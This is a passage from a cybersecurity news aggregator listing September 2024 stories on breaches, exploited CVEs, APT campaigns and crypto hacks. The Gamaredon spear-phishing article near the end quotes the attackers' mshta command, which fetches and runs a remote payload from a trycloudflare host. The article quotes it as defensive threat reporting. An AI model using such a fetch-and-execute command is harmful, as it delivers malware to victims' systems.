Security News
The latest news for cybersecurity collected from vast security websites.
2024-09-08 01:04:58
grep Has Leaked The Heritage Foundation Database that was Breached by SiegedSecgrep Has Leaked The Heritage Foundation Database that was Breached by SiegedSec
by Dark Web Informer
2024-09-07 23:47:25
Daily Dose of Dark Web Informer - September 7th, 2024This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.
by Dark Web Informer
2024-09-07 21:00:54
reconFTW: The Ultimate Tool for Automated Domain Reconnaissance and Vulnerability ScanningreconFTW: The Ultimate Tool for Automated Domain Reconnaissance and Vulnerability Scanning
by Dark Web Informer
2024-09-07 19:01:53
A Threat Actor Allegedly Has Leaked the Database to Indian Academy of PediatricsA Threat Actor Allegedly Has Leaked the Database to Indian Academy of Pediatrics
by Dark Web Informer
2024-09-07 18:11:20
Sorillus v7.2: Remote Administration Tool (RAT) DemonstrationSorillus v7.2: Remote Administration Tool (RAT) Demonstration
by Dark Web Informer
2024-09-07 17:28:54
Ransomware FeedRansomware.live provides detailed insights into recent victims, high-profile attacks in the press, ransomware groups, negotiation chats, comprehensive statistics, victims categorized by country, and cartographic visualizations of global incidents.
by Dark Web Informer
2024-09-07 17:00:00
888 Has Allegedly Leaked the Muzu.co Database888 Has Allegedly Leaked the Muzu.co Database
by Dark Web Informer
2024-09-07 16:21:26
A Threat Actor is Allegedly Selling Access to an Unidentified Dutch CompanyA Threat Actor is Allegedly Selling Access to an Unidentified Dutch Company
by Dark Web Informer
2024-09-07 16:19:40
U.S. CISA adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalogU.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Draytek VigorConnect and Kingsoft WPS Office vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: At the end of August, […]
by Security Affairs
2024-09-07 15:33:10
The 6 Different Types of HackersThe 6 Different Types of Hackers
by Dark Web Informer
2024-09-07 15:16:25
A Threat Actor is Allegedly Selling Singapore Citizens LeadsA Threat Actor is Allegedly Selling Singapore Citizens Leads
by Dark Web Informer
2024-09-07 14:20:33
A Threat Actor has Allegedly Leaked the Database of SmilePath AustraliaA Threat Actor has Allegedly Leaked the Database of SmilePath Australia
by Dark Web Informer
2024-09-07 13:00:00
For security, we have to stop picking up the phoneToday''s scams can be as simple as picking up a phone call. To avoid the next fraud, there are good reasons to let your calls run to voicemail. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-07 12:58:00
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job ScamsThreat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation. These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector. ""After an initial chat conversation, the attacker sent a ZIP file that contained
by The Hacker News
2024-09-07 12:40:00
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh NationalsTwo men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information. Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire
by The Hacker News
2024-09-07 11:30:00
Hackers Threaten to Leak Planned Parenthood DataPlus: Kaspersky’s US business sold, Nigerian sextortion scammers jailed, and Europe’s controversial encryption plans return.
by WIRED Security News
2024-09-07 11:13:28
A flaw in WordPress LiteSpeed Cache Plugin allows account takeoverA critical flaw in the LiteSpeed Cache plugin for WordPress could allow unauthenticated users to take control of arbitrary accounts. The LiteSpeed Cache plugin is a popular caching plugin for WordPress that accounts for over 5 million active installations. The plugin offers site acceleration through server-level caching and various optimization features. The LiteSpeed Cache plugin […]
by Security Affairs
2024-09-07 09:00:00
Data Skills Gap Is Hampering Productivity; Is Upskilling the Answer?The data skills gap is costing businesses significant productivity, with employees losing 26 working days annually, a Multiverse report finds. Companies are prioritizing upskilling efforts to bridge this gap and improve data competency.
by ITPro Today
2024-09-07 08:45:29
North Carolina Musician Charged After Employing AI Tools And Bots to Boost StreamsThe United States Attorney for the Southern District of New York announced the unsealing of a three-count criminal indictment against Michael Smith, a North Carolina musician. The indictment charged Smith with wire fraud, wire fraud conspiracy, and money laundering conspiracy for allegedly using artificial intelligence (AI) tools and thousands of bots to fraudulently stream songs billions of times to obtain more than $10 million in undeserved royalty payments. Michael Smith Exploited AI-Generated Songs According to the unsealed indictment, 52-year-old Michael Smith used hundreds of thousands of AI-generated songs to manipulate streaming numbers across various music streaming platforms, such as Amazon Music, Apple Music, Spotify, and YouTube Music, to continuously stream the AI-generated songs. He partnered with the CEO of an unnamed AI music company, who supplied him with thousands of tracks per month in exchange for a cut of the streaming revenue. Smith then deployed thousands of automated bot accounts to continuously stream these AI-generated songs, avoiding detection and claiming over $10 million in royalty payments. The songs were given randomly generated names and artist identities to make them appear as if they were created by real artists, rather than AI. Smith has been charged with wire fraud conspiracy, wire fraud, and money laundering conspiracy, each of which carries a maximum sentence of 20 years in prison. The case is being prosecuted by the Office''s Complex Frauds and Cybercrime Unit, and the FBI has praised the work of the investigators in uncovering this sophisticated scheme. Crackdown on Fraudulent Streaming Practices The case against Michael Smith is part of a broader effort by authorities to combat the growing problem of fraudulent streaming practices. Earlier this year, a man in Denmark was sentenced to 18 months in prison for a similar scheme. Music streaming platforms, such as Spotify, Apple Music, and YouTube, have also taken steps to address the issue, including changes to their royalty policies and increased efforts to detect and prevent artificial stream inflation. The music industry has seen a growing backlash, with artists signing open letters calling for the end of the predatory use of AI in the industry. The charges against Michael Smith represent a significant step in the fight against the misuse of AI technology in the music industry. As the case unfolds, it will likely have far-reaching implications, serving as a warning to those who seek to exploit the system and a call to action for the industry to address the challenges posed by the rise of AI-generated music. The outcome of this case will be closely watched as the music industry and streaming platforms navigate the complex landscape of recent technological advancements.
by The Cyber Express
2024-09-07 08:45:01
Telegram Founder Pavel Durov Hits Back Against Charges But Pledges Stricter ModerationPavel Durov, a Russian-born billionaire and the founder of Telegram, has issued public statements for the first time since his detention in France last month, denying claims that the messaging app functions as an ''anarchic paradise'' for cybercriminal activity. Durov was arrested amid an investigation into crimes related to child sexual abuse images, drug trafficking, and fraudulent transactions associated with the app. However, he has also pledged to overhaul the platform''s much-criticized moderation policies. Pavel Durov''s Detention for Telegram Related Charges Durov, who holds French citizenship, was detained in late August amid an investigation into alleged crimes on Telegram. While he managed to avoid jail time, Durov was released on a €5 million bail and ordered to report to police twice a week while remaining in France. Durov has since then criticized the decision of the French authorities to detain him, believing that they should have approached the company with these complaints rather than charging him personally. He argues that using laws from the pre-smartphone era to charge a CEO with crimes committed by third parties on the platform is a misguided approach. Durov pointed out that Telegram has an official representative for the EU region to accept and reply to requests, and that the French authorities had access to a hot line he had helped set up. He believes that the established standard practice is to start a legal action against the service itself, rather than targeting the CEO. In a lengthy statement posted to his Telegram channel early Friday, Durov acknowledged that the platform has struggled to keep pace with its rapid growth, which has reached nearly 1 billion users, making it easier for criminals to exploit its services. While 99.999% of Telegram users have nothing to do with crime, the 0.001% involved in illicit activities create a bad image for the entire platform, putting the interests of our almost billion users at risk,"" Durov wrote. Telegram''s Principles and Moderation Efforts Despite the criminal charges he faces, Durov defended Telegram''s principles and its commitment to user privacy. He said the platform has consistently refused to comply with demands from authoritarian governments, such as when it refused to hand over encryption keys to enable surveillance in Russia, leading to a ban from the Russian government. ""We are prepared to leave markets that aren''t compatible with our principles, because we are not doing this for money,"" Durov wrote. ""We are driven by the intention to bring good and defend the basic rights of people, particularly in places where these rights are violated,"" he added. Durov acknowledged that Telegram is not perfect and said the platform should improve its processes for handling law enforcement requests, mentioning that the platform removes millions of harmful posts and channels every day. ""We''ve already started that process internally, and I will share more details on our progress with you very soon,"" he added. He has pledged to revamp the company''s moderation policies, including removing features linked to illegal activity. The company has already taken steps to address these issues, including disabling new media uploads to its blogging tool Telegraph and removing its People Nearby feature. Despite the challenges, Durov expressed optimism that the recent events would ultimately strengthen Telegram and the social media industry as a whole. ""I hope that the events of August will result in making Telegram — and the social networking industry as a whole — safer and stronger,"" he expressed.
by The Cyber Express
2024-09-06 23:48:49
Daily Dose of Dark Web Informer - September 6th, 2024This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.
by Dark Web Informer
2024-09-06 22:42:49
Alleged Data Leak of Tourism Authority of ThailandAlleged Data Leak of Tourism Authority of Thailand
by Dark Web Informer
2024-09-06 22:08:06
natohub has Allegedly Leaked Data Belonging to Euraxess Europenatohub has Allegedly Leaked Data Belonging to Euraxess Europe
by Dark Web Informer
2024-09-06 22:00:58
Chinese APT Abuses VSCode to Target Government in AsiaA first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims'' environments for Southeast Asian espionage. The post Chinese APT Abuses VSCode to Target Government in Asia appeared first on Unit 42.
by Palo Alto Networks - Unit42
2024-09-06 21:48:20
Car rental company Avis discloses a data breachCar rental giant Avis disclosed a data breach that impacted one of its business applications in August compromising customers’ personal information. Car rental company Avis notified customers impacted in an Augus data breach. Threat actors breached one of its business applications and gained access to some of the customers’ personal information. “We discovered on August […]
by Security Affairs
2024-09-06 21:25:00
SonicWall Urges Users to Patch Critical Firewall Flaw Amid Possible ExploitationSonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. ""An improper access control vulnerability has been identified in the SonicWall SonicOS management
by The Hacker News
2024-09-06 21:12:07
Critical GeoServer Vulnerability Exploited in Global Malware CampaignA critical GeoServer vulnerability (CVE-2024-36401) is being actively exploited, allowing attackers to take control of systems for malware…
by Hackread
2024-09-06 20:44:00
GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet MalwareA recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In
by The Hacker News
2024-09-06 20:40:52
Nearly 1 million Wisconsin Medicare users had information leaked in MOVEit breach
by The Record
2024-09-06 20:33:00
GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious CodeThreat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across
by The Hacker News
2024-09-06 20:32:14
Phishing Attack Takes a Two-Step Approach to Leverage Legitimate Sites and Evade DetectionAnalysis of a new phishing attack demonstrates how attackers may take a longer path to reach their malicious goals while staying “under the radar” of security products.
by KnowBe4
2024-09-06 20:20:55
Mitiga Cloud Managed Detection and Response (MDR) Reduces Alert Fatigue and Bolsters SecOps Resources | MitigaLearn about Mitiga’s fully-managed cloud detection and response service that operates 24/7.
by Mitiga
2024-09-06 20:15:51
Hypervisor Development in Rust for Security Researchers (Part 1)In the ever-evolving field of information security, curiosity and continuous learning drive innovation.
by SpiderLabs Blog
2024-09-06 19:48:04
Feds Warn on Russian Actors Targeting Critical InfrastructureIn the past, Putin''s Unit 29155 has utilized malware like WhisperGate to target organizations, particularly those in Ukraine.
by Dark Reading
2024-09-06 19:44:38
CISA Flags ICS Bugs in Baxter, Mitsubishi ProductsThe vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.
by Dark Reading
2024-09-06 19:25:09
Commercial Spyware Use Roars Back Despite SanctionsVendors of mercenary spyware tools used by nation-states to track citizens and enemies have gotten savvy about evading efforts to limit their use.
by Dark Reading
2024-09-06 19:22:59
YouTube removes Tenet Media channel over alleged ties to Russian disinformation effort
by The Record
2024-09-06 18:59:17
SonicWall warns that SonicOS bug exploited in attacksRecently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. SonicWall warns that a recently fixed access control flaw, tracked as CVE-2024-40766 (CVSS v3 score: 9.3), in SonicOS is now potentially exploited in attacks. “An improper access control vulnerability has been identified in the SonicWall SonicOS management […]
by Security Affairs
2024-09-06 18:23:21
In latest check-in, spy agencies describe 'ramp up'' in election influence
by The Record
2024-09-06 18:02:51
West Virginia law enforcement sues data broker for publishing personal information online
by The Record
2024-09-06 17:45:44
Russian dark web marketplace admins indicted after arrest in Miami
by The Record
2024-09-06 17:13:08
AI Firm’s Misconfigured Server Exposed 5.3 TB of Mental Health RecordsA misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health…
by Hackread
2024-09-06 16:44:40
US Gov Removing Four-Year-Degree Requirements for Cyber JobsThe US government will remove ""unnecessary degree requirements"" in favor of skills-based hiring to help fill 500,000 open cybersecurity jobs. The post US Gov Removing Four-Year-Degree Requirements for Cyber Jobs appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 16:43:58
TIDRONE Espionage Group Targets Taiwan’s Military Drone IndustryTrend Micro has uncovered a new threat group, dubbed TIDRONE, targeting Taiwan''s military and satellite industries, with a specific focus on drone manufacturers. This campaign employs advanced malware and espionage tactics, likely linked to a Chinese-speaking cyber espionage group. The TIDRONE campaign, active since early 2024, is suspected to be a supply chain attack, leveraging … The post TIDRONE Espionage Group Targets Taiwan’s Military Drone Industry appeared first on CyberInsider.
by Cyber Insider
2024-09-06 16:39:47
One million US Kaspersky customers to be migrated to this lesser-known alternativeKaspersky customers in the US can continue their existing subscriptions with a replacement product from the company''s ''trusted partner''. Here''s what to know.
by ZDNET Security
2024-09-06 16:34:37
Cybersecurity Talent Shortage Prompts White House ActionThe Biden administration launches an initiative to encourage careers in cybersecurity, as businesses try new tactics to get unfilled IT security roles staffed.
by Dark Reading
2024-09-06 16:34:09
Veeam patches 5 critical vulnerabilities, including unauthenticated RCE flawAn advisory for 18 patched flaws includes one that could enable “full system takeover,” researchers said.
by SC Media
2024-09-06 15:58:02
Slack: There Are Five Types of AI UsersThe company’s framing of AI personas offers a roadmap for nudging workers along to where managers want them to go in using new technologies.
by ITPro Today
2024-09-06 15:49:08
Transport for London staff faces systems disruptions after cyberattackTransport for London, the city''s public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. [...]
by BleepingComputer
2024-09-06 15:36:17
The Windows 10 clock is ticking: here are 5 ways to save your old PC in 2025 (most are free)As many as 240 million Windows 10 PCs can''t be upgraded to Windows 11. Instead of tossing your device when Windows 10 support runs out, here are five viable alternatives to save you money and avoid headaches.
by ZDNET Security
2024-09-06 15:17:19
Lowe’s employees targeted in new malvertising campaignIn August, Lowe''s employees were the subject of a targeted campaign using fake ads and websites.
by ThreatDown
2024-09-06 15:07:05
CISA Alert AA24-249A: Russian GRU Unit 29155 Targeting U.S. and Global Critical InfrastructureOn September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through their highly associated and destructive malware, such as WhisperGate.
by Picus Security
2024-09-06 15:07:00
The State of the Virtual CISO Report: MSP/MSSP Security Strategies for 2025The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,
by The Hacker News
2024-09-06 15:05:25
Transport for London outages drag into weekend after cyberattackIn a brief update ahead of the weekend, the London transport network said it has no evidence yet that customer data was compromised. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-06 15:02:17
AI and the Green Market Revolution Will IntertwineWhile AI has huge potential to mitigate the environmental crisis, the technology that powers AI has a huge impact on climate change and water resources. Learn how the futures of AI and the green market revolution are intimately linked and how they will both become invisibly embedded into our daily lives.
by ITPro Today
2024-09-06 15:02:01
Adventures in Shellcode Obfuscation! Part 12: Jigsawby Mike Saunders, Principal Consultant     This blog is the twelfth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the […]
by Red Siege Blog
2024-09-06 15:00:29
FreeBSD Gets €686,400 to Boost Security FeaturesThe funds from Germany’s Sovereign Tech Fund will be used to integrate security features such as zero trust capabilities and tools for software bill of materials.
by Dark Reading
2024-09-06 14:51:18
New global standard aims to build security around large language modelsThe WDTA framework spans the lifecycle of large language models, offering guidelines to manage integration with other systems.
by ZDNET Security
2024-09-06 14:48:24
Apache patches OFBiz bypass vulnerabilitySecurity pros say this flaw could be integrated into a botnet, so teams should patch immediately.
by SC Media
2024-09-06 14:04:32
Car rental giant Avis discloses data breach impacting customersAmerican car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...]
by BleepingComputer
2024-09-06 14:00:00
Using Transparency & Sharing to Defend Critical InfrastructureNo organization can single-handedly defend against sophisticated attacks. Governments and private sector entities need to collaborate, share information, and develop defenses against cyber threats
by Dark Reading
2024-09-06 13:49:25
Exposed: Russian military Unit 29155 does digital sabotage, espionageThe US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which they deem resposible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently computer network operations against NATO member and ally countries. “Since early 2022, the primary focus of the cyber actors appears to be … More → The post Exposed: Russian military Unit 29155 does digital sabotage, espionage appeared first on Help Net Security.
by Help Net Security
2024-09-06 13:10:56
Recent SonicWall Firewall Vulnerability Potentially Exploited in the WildSonicWall is warning customers that the recently patched critical vulnerability CVE-2024-40766 may be exploited in the wild. The post Recent SonicWall Firewall Vulnerability Potentially Exploited in the Wild appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 13:00:47
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 36DoJ seizes 32 Doppelgänger domains, Veeam releases fix for critical RCE flaw in backup product, and DPRK attackers exploit Chromium zero-day. The post The Good, the Bad and the Ugly in Cybersecurity – Week 36 appeared first on SentinelOne.
by SentinelOne
2024-09-06 13:00:00
How cyber criminals are compromising AI software supply chainsWith the adoption of artificial intelligence (AI) soaring across industries and use cases, preventing AI-driven software supply chain attacks has never been more important. Recent research by SentinelOne exposed a new ransomware actor, dubbed NullBulge, which targets software supply chains by weaponizing code in open-source repositories like Hugging Face and GitHub. The group, claiming to […] The post How cyber criminals are compromising AI software supply chains appeared first on Security Intelligence.
by Security Intelligence
2024-09-06 13:00:00
The NSA Has a Podcast—Here's How to Decode ItThe spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod''s actually worth a listen.
by WIRED Security News
2024-09-06 12:59:49
The 2024 Threat Landscape State of PlayTalos'' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.
by Cisco Talos Blog
2024-09-06 12:47:43
In Other News: US Army Hacks Buildings, X Hiring Cybersecurity Staff, Bitcoin ATM ScamsNoteworthy stories that might have slipped under the radar: US Special Forces can hack buildings, X is hiring cybersecurity staff, and FTC warns of Bitcoin ATM scams. The post In Other News: US Army Hacks Buildings, X Hiring Cybersecurity Staff, Bitcoin ATM Scams appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 12:30:38
Penpie DeFi Hack: $27 Million Stolen, Pushing Crypto Theft Over $1.2 Billion in 2024The decentralized finance (DeFi) ecosystem has been rocked by another major security breach. Penpie, a protocol built on the Pendle platform, suffered a hack on September 3, 2024. The protocol informed that the breach resulted in the theft of approximately $27 million worth of cryptocurrency. This Penpie Defi Hack adds to the already concerning rise in crypto scams, pushing total losses for 2024 past the staggering $1.2 billion mark. Details of the Penpie DeFi Hack The Penpie post-mortem report sheds light on some specifics of the exploit. It reveals that the attacker leveraged a vulnerability in Penpie''s reward distribution mechanism. This vulnerability allowed the attacker to deploy a malicious smart contract, categorized as an ""evil market,"" that inflated the attacker''s staking balance on the platform. By manipulating this balance, the attacker could claim a significantly larger share of rewards than intended, ultimately draining millions of dollars worth of crypto assets. Following the hack, the blockchain suspended all deposits and withdrawals, effectively halting operations to prevent further losses. The team also filed complaints with both the Singapore police and the FBI. They also sent a message to the hacker promising a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” they wrote. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let’s find a mutually beneficial solution.” [caption id=""attachment_89338"" align=""alignnone"" width=""738""] Penpie''s Appeal to Hacker. Source: X[/caption] Euler Finance Cybercriminal Lauds Penpie Hacker Soon after the incident, reports emerged that the Penpie hacker quickly moved a significant portion of the stolen funds – around $7 million – through the crypto mixer Tornado Cash. These mixers are designed to obfuscate the origin and destination of cryptocurrency transactions, making them a popular tool for criminals seeking to launder ill-gotten gains. Following the crypto hack, another infamous Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, left on the blockchain. The message, directed at the Penpie hacker, expressed praise for their decision not to return the stolen funds. “Good job bro. I didn’t see a hack like this for a while. I’m happy you kept all the money and didn’t let these bastards get back one dollar of what you took. You won, they lost. Good job,” they wrote. [caption id=""attachment_89339"" align=""alignnone"" width=""1338""] Cybercriminal Lauds Penpie Hacker. Source: X[/caption] Over 9,000 Victims in August Due to Cyrpto Phishing Scams: Report Unfortunately, the Penpie incident is just one in a series of major DeFi hacks in 2024. The cryptocurrency landscape continues to be plagued by cyberattacks, with the total value of stolen funds in 2024 surpassing $1.21 billion. This represents a 15.5% increase compared to the previous year, according to a report by Immunfi. The losses are spread across 154 separate incidents, with the majority occurring in the DeFi space. August 2024 was particularly alarming for crypto investors, as hackers exploited various vulnerabilities to steal millions of dollars. Two major attacks during this period resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai. [caption id=""attachment_89341"" align=""alignnone"" width=""900""] Source: Scam Sniffer Report[/caption] Phishing scams also saw a significant surge in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims fell prey to these scams, losing about $63 million. A single large-scale phishing attack accounted for the majority of these losses, with approximately $55 million stolen. Regulation and the Future of DeFi The increasing frequency of DeFi hacks has also sparked discussions surrounding potential regulations. While some advocate for a more hands-on approach from regulatory bodies, others argue that such measures may stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. However, it''s clear that addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.
by The Cyber Express
2024-09-06 12:15:19
Microsoft Office 2024 to disable ActiveX controls by defaultAfter Office 2024 launches in October, Microsoft will disable ActiveX controls by default in Word, Excel, PowerPoint, and Visio client apps. [...]
by BleepingComputer
2024-09-06 12:05:00
Critical Security Flaw Found in LiteSpeed Cache Plugin for WordPressCybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1. ""The plugin suffers from an
by The Hacker News
2024-09-06 12:04:52
Cloud Security Assurance: Is Automation Changing the Game?We explore the opportunities and limitations of automated security assurance by taking a close look at GCP and Azure cloud reports for ISO 27001.
by ITPro Today
2024-09-06 11:56:39
HTTP security headers: An easy way to harden your web applicationsModern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right. The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.
by Invicti
2024-09-06 11:55:29
Gen Alpha: Navigating Cybersecurity in an AI-Native WorldIn 2020, according to population estimates from the U.S. Census Bureau, millennials surpassed Baby Boomers as the nation’s largest living adult generation. Millennials were heralded as digital natives, the first generation to grow up immersed in the digital world of the internet, smartphones, and social media. This has fundamentally shaped their communication, work habits, and lifestyles […] The post Gen Alpha: Navigating Cybersecurity in an AI-Native World appeared first on IT Security Guru.
by IT Security Guru
2024-09-06 11:50:06
Apache Makes Another Attempt at Patching Exploited RCE in OFBizThe latest Apache OFBiz update patches CVE-2024-45195, a bypass of a recently disclosed remote code execution bug exploited in attacks. The post Apache Makes Another Attempt at Patching Exploited RCE in OFBiz appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 11:43:06
New Android Malware SpyAgent Targets Crypto Wallets with Image RecognitionA newly discovered Android malware named ‘SpyAgent'' is stealing sensitive cryptocurrency credentials using advanced image recognition technology. The malware, discovered by McAfee''s Mobile Research Team, targets mnemonic keys used to recover crypto wallets by scanning images on infected devices. These 12-word phrases serve as a more user-friendly alternative to traditional, complex private keys, making their … The post New Android Malware SpyAgent Targets Crypto Wallets with Image Recognition appeared first on CyberInsider.
by Cyber Insider
2024-09-06 11:37:41
The complete list of Q2 2024 releases and updates on HTB Enterprise PlatformResponding to the feedback we’ve received from our 2.9 million community of cybersecurity professionals, we’re excited to share the new Hack The Box updates released over the past 3 months.
by Hack The Box Blog
2024-09-06 11:37:07
Feds warn of broad Russia-linked CVE exploits targeting critical infrastructureAttackers operating under the direction of Russia’s military intelligence service are targeting governments, finance, transportation, energy and healthcare.
by Cybersecurity Dive
2024-09-06 11:28:01
Cybersecurity M&A Roundup: 36 Deals Announced in August 2024Roundup of the three dozen cybersecurity-related merger and acquisition (M&A) deals announced in August 2024. The post Cybersecurity M&A Roundup: 36 Deals Announced in August 2024 appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 11:17:29
SpyAgent Android malware steals your crypto recovery phrases from imagesA new Android malware named SpyAgent uses optical character recognition (OCR) technology to steal cryptocurrency wallet recovery phrases from screenshots stored on the mobile device. [...]
by BleepingComputer
2024-09-06 11:16:38
Gamaredon APT Launches Spear-Phishing Campaign Targeting Ukrainian MilitaryA sophisticated spear-phishing campaign orchestrated by the Gamaredon APT group has emerged as a threat to Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has revealed this extensive operation, which capitalizes on spear-phishing emails to compromise sensitive military systems. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-affiliated Advanced Persistent Threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, Gamaredon has been notorious for its cyber-espionage activities. Despite the relatively low sophistication of their tools, the group''s persistent focus on specific geopolitical targets has led to numerous successful attacks. An Overview of the Gamaredon Campaign The latest campaign by Gamaredon reflects an escalation in their tactics and scope. CRIL’s recent analysis reveals that the group is employing spear-phishing emails to deliver malicious payloads aimed at Ukrainian military personnel. This campaign leverages spear-phishing emails to distribute harmful content, demonstrating a clear pattern of coordinated and large-scale cyberattacks. [caption id=""attachment_89329"" align=""alignnone"" width=""1024""] Gamaredon Sample Observed in the Wild (Source: Cyble)[/caption] The spear-phishing emails at the heart of this Gamaredon campaign are designed to deceive recipients into executing malicious files. The emails are themed around military summons, with subjects such as “ПОВІСТКА” (which translates to ""summons""). Each email contains a malicious XHTML attachment, crafted to initiate a series of damaging actions when opened. Upon activation, the XHTML file executes obfuscated JavaScript code. This script, hidden within a div element with an id set to “jwu,” utilizes Base64 encoding and random characters to obscure its true intent. The obfuscation is a deliberate tactic to evade detection by security systems. The JavaScript code runs silently, downloading a RAR compressed folder into the victim’s Downloads directory. This folder is designed to appear as a legitimate file, further tricking the user. The downloaded RAR file contains a Windows shortcut (LNK) file. When executed, this shortcut initiates the running of a remote .tar archive. The Gamaredon group has employed TryCloudflare’s one-time tunnel feature to host these malicious files. By leveraging TryCloudflare, the attackers can use a temporary, anonymous tunnel to access resources and deploy their payloads without traditional detection methods. The specific command executed by the LNK file is: “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f” This command directs the system to retrieve and run the malicious .tar file from the TryCloudflare domain. The Gamaredon Campaign''s Scale and Impact The ongoing Gamaredon campaign is notable for its large-scale and sophisticated execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort. The use of TryCloudflare’s one-time tunnel feature highlights the group''s ingenuity in circumventing traditional cybersecurity measures. A key component of this campaign is the inclusion of a 1-pixel remote image within the malicious files. This image acts as a tracking mechanism, allowing the attackers to monitor interactions with their phishing content and gauge the effectiveness of their attacks. While CRIL’s investigation was unable to retrieve the contents of the .tar files, analyses from other cybersecurity experts, such as Cisco Talos, suggest that these archives likely contain additional malicious payloads designed to exfiltrate sensitive information from compromised systems. Implications for Cybersecurity and Recommendations To counteract sophisticated spear-phishing attacks, organizations, particularly those in sensitive sectors like the military, must adopt comprehensive cybersecurity strategies. First, user training is essential. Educating users on how to recognize spear-phishing attempts, especially those involving unexpected military-themed attachments or messages, is crucial. Awareness plays a significant role in reducing the success rate of such attacks. Advanced email security is another critical component. Implementing email security solutions with advanced threat protection capabilities helps filter out phishing emails and malicious attachments effectively. In addition, deploying robust anti-malware solutions is necessary. These tools should be capable of detecting and blocking obfuscated JavaScript code and malicious LNK files. Regular updates and scans are essential for maintaining protection against online threats. Network monitoring is also vital. Keeping an eye out for unusual network activity, such as connections to TryCloudflare’s one-time tunnels or other unknown external resources, helps in the early detection of anomalies, which can prevent further infiltration. Application whitelisting should be used to allow only trusted applications and scripts to run on systems. This measure helps prevent the unauthorized execution of potentially harmful files. Lastly, leveraging threat intelligence platforms is 